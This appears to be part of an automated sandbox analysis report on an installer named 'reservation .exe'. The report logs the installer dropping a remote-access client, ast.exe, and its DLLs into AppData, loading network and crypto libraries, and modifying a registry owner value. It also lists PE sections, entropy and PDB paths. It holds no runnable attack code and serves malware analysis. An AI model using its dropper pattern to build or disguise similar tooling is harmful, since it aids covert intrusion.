                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: astcrp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libssl-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeFile written: C:\Users\user\AppData\Roaming\fat\config.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpWindow found: window name: TMainFormJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: reservation .exeStatic file information: File size 7988632 > 1048576
                          Source: reservation .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: vcruntime140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2456715536.00000000030E6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3329265043.000000006BC70000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: vcomp140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6FAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B6FAE50
                          Source: reservation .exeStatic PE information: section name: .didata
                          Source: reservation .tmp.0.drStatic PE information: section name: .didata
                          Source: reservation .tmp.3.drStatic PE information: section name: .didata
                          Source: is-MGO66.tmp.4.drStatic PE information: section name: .rodata
                          Source: is-BI7PN.tmp.4.drStatic PE information: section name: .textbss
                          Source: is-BI7PN.tmp.4.drStatic PE information: section name: .msvcjmc
                          Source: is-BI7PN.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-RFQHO.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-SJ8AI.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-PO10S.tmp.4.drStatic PE information: section name: .code
                          Source: quartz.dll.8.drStatic PE information: section name: .code
                          Source: astrct.dll.8.drStatic PE information: section name: .rodata
                          Source: hatls.dll.8.drStatic PE information: section name: .textbss
                          Source: hatls.dll.8.drStatic PE information: section name: .msvcjmc
                          Source: hatls.dll.8.drStatic PE information: section name: .00cfg
                          Source: libcrypto-1_1.dll.8.drStatic PE information: section name: .00cfg
                          Source: libssl-1_1.dll.8.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B729F78 push ecx; ret 10_2_6B729F76
                          Source: is-PDQGE.tmp.4.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: msvcr120.dll.8.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: C:\Users\user\Desktop\reservation .exeFile created: \reservation .exe
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: \reservation .tmp
                          Source: C:\Users\user\Desktop\reservation .exeFile created: \reservation .exe
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: \reservation .tmp
                          Source: C:\Users\user\Desktop\reservation .exeFile created: \reservation .exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: \reservation .tmpJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeFile created: \reservation .exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: \reservation .tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\opus.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libcrypto-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\quartz.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\reservation .exeFile created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\AstCrp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\astclient.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\AstCrp.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libssl-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libeay32.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\msvcr120.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\ast.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-PO10S.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)Jump to dropped file
